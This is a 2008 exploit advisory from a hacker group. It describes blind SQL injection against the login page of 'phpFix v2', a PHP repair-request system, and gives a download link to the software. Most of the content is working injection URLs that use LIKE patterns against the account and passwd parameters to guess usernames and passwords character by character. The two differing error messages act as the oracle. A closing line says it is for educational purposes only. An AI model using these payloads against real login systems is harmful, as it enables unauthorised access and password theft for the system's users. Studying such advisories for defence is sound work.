/ | || | _ \| _ | _ | |
| (| _ | [)/| () | () | | |
\_____|| ||| ||||| ||
C. H. R. O. O. T. SECURITY GROUP
- – ----- — – – ---- — – -
http://www.chroot.org
_ _ _ _____ ____ ____ __ _
Hacks In Taiwan | || | | | | | \| |
Conference 2008 | _ | | | | | (| () | |
|| ||| || \|||\__|
http://www.hitcon.org
Title :: phpFix v2 Multiple SQL Injection Vulnerability
Author :: unohope [at] chroot [dot] org
IRC :: irc.chroot.org #chroot
ScriptName :: php線上報修系統 v2
Download :: http://netlab.kh.edu.tw/download/php報修系統2.zip
Mirror :: http://www.badongo.com/file/9541310
[SQL Injection]
magic_quotes_gpc = Off
safe_mode = Off
[Blind SQL Injection]
http://localhost/phpfix/auth/00_pass.php?passwd=blah&account='+or+account+like+'blah% // for login
account
http://localhost/phpfix/auth/00_pass.php?passwd=blah&account='+or+passwd+like+'blah% // for login
password
if matched, then return
"密碼錯誤、請不要矇騙過關",
else return
"帳號錯誤、請不要矇騙過關",
try error till you got it!
[NOTE]
!! This is just for educational purposes, DO NOT use for illegal. !!